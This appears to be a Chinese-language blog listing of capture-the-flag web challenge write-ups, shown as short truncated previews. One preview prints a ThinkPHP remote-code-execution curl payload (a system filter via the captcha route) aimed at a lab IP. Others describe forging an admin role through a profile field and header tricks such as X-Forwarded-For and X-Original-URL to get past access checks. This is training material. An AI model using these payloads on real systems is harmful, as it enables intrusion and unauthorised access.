buy
本文档原始附件已同步到博客:/pdfs/buy-3f0e9979.pdf。 点此下载附件
easyphp
本文档原始附件已同步到博客:/pdfs/easyphp.pdf。 点此下载附件
thinkphp
1,CVE复现,payload: 1curl http://121.43.27.97:20105/index.php?s=captcha -X POST -d _method=__construct&filter[]=system&method=get&server[...
教务系统的秘密
1.打开靶场,直接注册登录 2.要求admin才能查看机密信息,Chrl+U可以看到这样一个用来更新信息的函数 3.将bio改成admin并加入role字段尝试伪造admin 4.得到flag
http
遇到这种情况 试这些头 “Only localhost” X-Forwarded-For: 127.0.0.1 403 Forbidden X-Original-URL: /admin SSRF题目 Host: 127.0.0.1:8080 文件上传限制 Co...
